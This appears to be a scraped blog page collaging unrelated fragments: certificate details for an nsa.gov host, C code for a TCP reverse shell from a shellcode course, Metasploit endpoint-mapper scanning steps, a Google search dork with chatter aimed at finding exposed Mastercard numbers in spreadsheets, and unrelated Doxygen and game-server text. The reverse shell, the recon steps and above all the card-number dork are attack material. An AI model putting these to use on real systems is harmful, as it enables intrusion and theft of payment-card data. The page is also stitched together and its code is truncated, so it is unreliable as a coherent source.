Friday, September 2, 2016

https://ssl-tools.net/subjects/e7283e531dbea071ab46d31bc35076989a9795a5

emsm-gh1-uea10.nsa.gov

C=US
O=U.S. Government
OU=DoDPKINSA/CSS
CN=emsm-gh1-uea10.nsa.gov
Fingerprints: d9fcc417c2
Issuer:
DOD ID SW CA-37
Serial:
12177
Not valid before:
2016-04-12 14:40­:26 UTC
Not valid after:
2019-04-13 14:40­:26 UTC
Key size:
2048
Signature Algorithm:
sha256WithRSAEnc­ryption
authorityKeyIdentifier:
keyid:16:24:7E:F­7:2D:C1:EF:92:3F­:BE:44:E7:54:5E:­E9:FE:17:BA:F3:A­1
subjectKeyIdentifier:
53:D9:A5:2D:B9:A­C:82:A0:F3:12:59­:BE:C5:5B:A9:63:­D6:81:83:25
authorityInfoAccess:
CA Issuers - URI­:http://crl.disa­.mil/sign/DODIDS­WCA_37.cer­OCSP - URI:http:­//ocsp.disa.mil
keyUsage:
Digital Signatur­e, Key Encipherm­ent
crlDistributionPoints:
Full Name:­ URI:http://crl­.disa.mil/crl/DO­DIDSWCA_37.crl
subjectAltName:
DNS:emsm-gh1-uea­10.nsa.gov
certificatePolicies:
Policy: 2.16.840­.1.101.2.1.11.39
extendedKeyUsage:
TLS Web Server A­uthentication, T­LS Web Client Au­thentication, 1.­3.6.1.5.5.8.2.2

Certificates

Fingerprint Issuer Serial Public Key Download Tools
d9fc­c417­c29a­037d­ac90­aea5­f178­e91d­59ec­9862DOD ID SW CA-371217­7d9fcc417c2

Create shellcode for a tcp reverse shell (SLAE)

shell_reverse_tcp.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include
#include
#include
#include
#include
#include
#include
 
int main(void) {
    int sockfd;         // file descriptor for socket
    int lportno = 12345;    // listener port
    struct sockaddr_in serv_addr; // {2,str[14]}
    char *const params[] = {"/bin/sh",NULL};
    char *const environ[] = {NULL};
 
    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET; // 2
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // localhost
    serv_addr.sin_port = htons(lportno);  // little endian
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);
    // redirect stdout and stderr
    dup2(sockfd,0); // stdin
    dup2(0,1); // stdout
    dup2(0,2); // stderr
    execve("/bin/sh",params,environ);

 
 
 
YOU NEED TO KNOW WHERE TO GO:
 
 

endpoint_mapper

The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
msf > use auxiliary/scanner/dcerpc/endpoint_mapper 
msf auxiliary(endpoint_mapper) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    135              yes       The target port
   THREADS  1                yes       The number of concurrent threads
In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.

https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/ 

Server signature , how to get it ?

Server signature is now available for everyone, i'll just show with pictures where to get it and how to use it.
Thats pretty simple.

Go to serverlist , choose the server you are interested in , check bottom infos to get the signature code.
(click on the picture to see fullsize)



Once you clicked on server signature you should get this :



Copy the code & insert it to your signature for example , using the " Insert Image" function

Which gives :



Tips : select your image(double click on it) then add a link example : http://et.trackbase.net/server/41109/
So if you click on your signature , you are redirected to your server page.

Just add two numbers, separated by two periods, with no spaces, into the search box along with your search terms. "mastercard 0..9999999999999999 filetype:xls"

should he place xls..or xks ...
I don't think is going to find nothing xls...because that is of course offline...so he needs a java reader ONLINE tool




Doxygen

Generate documentation from source code

Doxygen is the de facto standard tool for generating documentation from annotated C++ sources, but it also supports other popular programming languages such as C, Objective-C, C#, PHP, Java, Python, IDL (Corba, Microsoft, and UNO/OpenOffice flavors), Fortran, VHDL, Tcl, and to some extent D.
Doxygen can help you in three ways:
  1. It can generate an on-line documentation browser (in HTML) and/or an off-line reference manual (in $\mbox{\LaTeX}$) from a set of documented source files. There is also support for generating output in RTF (MS-Word), PostScript, hyperlinked PDF, compressed HTML, and Unix man pages. The documentation is extracted directly from the sources, which makes it much easier to keep the documentation consistent with the source code.
  2. You can configure doxygen to extract the code structure from undocumented source files. This is very useful to quickly find your way in large source distributions. Doxygen can also visualize the relations between the various elements by means of include dependency graphs, inheritance diagrams, and collaboration diagrams, which are all generated automatically.
  3. You can also use doxygen for creating normal documentation (as I did for the doxygen user manual and web-site).
Doxygen is developed under Mac OS X and Linux, but is set-up to be highly portable. As a result, it runs on most other Unix flavors as well. Furthermore, executables for Windows are available.

http://www.stack.nl/~dimitri/doxygen/ 


Google Hacking Database (GHDB)

Search the Google Hacking Database or browse GHDB categories

https://www.exploit-db.com/google-hacking-database/ 

Cielo e terra (duet with Dante Thomas)